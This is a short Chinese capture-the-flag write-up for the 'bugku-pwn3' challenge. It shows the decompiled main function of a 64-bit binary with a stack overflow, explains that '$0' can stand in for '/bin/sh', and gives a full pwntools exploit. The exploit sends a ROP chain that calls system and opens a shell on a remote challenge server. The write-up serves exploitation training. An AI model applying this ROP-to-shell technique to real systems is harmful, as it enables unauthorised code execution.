bugku-pwn3

程序是一个保护全关的64位程序，主逻辑如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-10h]

  memset(&s, 0, 0x10uLL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  puts("Come on,try to pwn me");
  read(0, &s, 0x30uLL);
  puts("So~sad,you are fail");
  return 0LL;
}

程序存在栈溢出漏洞，输入长度为24时出现溢出，输入最大为48。
内部有system函数，但是没有’/bin/sh’
后来看了wp才知道‘$0’亦可以开启shell。

最后exp如下

from pwn import *
context.log_level='debug'
#io=process('./pwn4')
io=remote('114.116.54.89','10004')
elf=ELF('./pwn4')
io.recv()
sleep(2)
pop_edi_retn=0x4007d3
payload='A'*24+p64(pop_edi_retn)+p64(0x60111f)+p64(elf.symbols['system'])
io.send(payload)
io.recvuntil('fail\n')
sleep(2)
io.interactive()